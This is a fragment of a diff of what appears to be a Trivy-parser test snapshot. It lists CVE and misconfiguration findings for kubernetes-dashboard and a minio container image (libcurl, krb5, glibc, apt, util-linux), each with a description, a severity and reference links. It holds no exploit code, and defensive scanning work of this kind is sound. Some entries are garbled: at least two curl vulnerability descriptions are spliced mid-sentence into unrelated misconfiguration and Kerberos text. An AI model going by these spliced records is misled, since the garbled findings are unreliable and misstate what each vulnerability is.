"https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", + ], + }, + "category": "Vulnerability", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", + "mitigation": undefined, + "name": "handle server errors after sending GOAWAY", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1304.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8361.html", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5464-1", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "value": "https://bugzilla.redhat.com/2107383", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "7.74.0-1.3+deb11u5", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-32221", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "libcurl4", - "references": [ - "http://seclists.org/fulldisclosure/2023/Jan/19", - "http://seclists.org/fulldisclosure/2023/Jan/20", - "http://www.openwall.com/lists/oss-security/2023/05/17/4", - "https://access.redhat.com/errata/RHSA-2023:0333", - "https://access.redhat.com/security/cve/CVE-2022-32221", - "https://bugzilla.redhat.com/2135411", - "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", - "https://curl.se/docs/CVE-2022-32221.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", - "https://errata.almalinux.org/9/ALSA-2023-0333.html", - "https://errata.rockylinux.org/RLSA-2023:0333", - "https://hackerone.com/reports/1704017", - "https://linux.oracle.com/cve/CVE-2022-32221.html", - "https://linux.oracle.com/errata/ELSA-2023-0333.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", - "https://security.gentoo.org/glsa/202212-01", - "https://security.netapp.com/advisory/ntap-20230110-0006/", - "https://security.netapp.com/advisory/ntap-20230208-0002/", - "https://support.apple.com/kb/HT213604", - "https://support.apple.com/kb/HT213605", - "https://ubuntu.com/security/notices/USN-5702-1", - "https://ubuntu.com/security/notices/USN-5702-2", - "https://ubuntu.com/security/notices/USN-5823-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32221", - "https://www.debian.org/security/2023/dsa-5330", - ], - }, - "category": "Vulnerability", - "description": "When doing HTTP(S) transfers, libcurl might erroneously use the read callback (\`CURLOPT_READFUNCTION\`) to ask for data to send, even when the \`CURLOPT_POSTFIELDS\` option has been set, if the same handle previously was used to issue a \`PUT\` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent \`POST\` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "POST following PUT confusion", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32221", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/19", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/20", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/17/4", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0333", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32221", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2135411", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://curl.se/docs/CVE-2022-32221.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0333.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0333", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://hackerone.com/reports/1704017", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-32221.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0333.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202212-01", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230110-0006/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230208-0002/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213604", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213605", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5823-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32221", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5330", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-23914", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "libcurl4", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-23914", - "https://curl.se/docs/CVE-2023-23914.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23914", - "https://hackerone.com/reports/1813864", - "https://nvd.nist.gov/vuln/detail/CVE-2023-23914", - "https://security.netapp.com/advisory/ntap-20230309-0006/", - "https://ubuntu.com/security/notices/USN-5891-1", - "https://www.cve.org/CVERecord?id=CVE-2023-23914", - ], - }, - "category": "Vulnerability", - "description": "A cleartext transmission of sensitive information vulnerability exists in curl 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-43552", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230214-0002/", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213670", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5788-1", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5894-1", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-43552", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-23915", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "libcurl4", + "id": "CVE-2011-3374", + "installedVersion": "2.2.4", + "packageName": "apt", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-23915", - "https://curl.se/docs/CVE-2023-23915.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23915", - "https://hackerone.com/reports/1826048", - "https://nvd.nist.gov/vuln/detail/CVE-2023-23915", - "https://security.netapp.com/advisory/ntap-20230309-0006/", - "https://ubuntu.com/security/notices/USN-5891-1", - "https://www.cve.org/CVERecord?id=CVE-2023-23915", + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", ], }, "category": "Vulnerability", - "description": "A cleartext transmission of sensitive information vulnerability exists in curl n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + }, + { + "type": "URL", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "libblkid1", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, - { - "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2.31-13+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, ], "severity": "HIGH", @@ -60602,564 +60924,653 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "id": "CVE-2010-4756", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", + "id": "CVE-2018-20796", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + 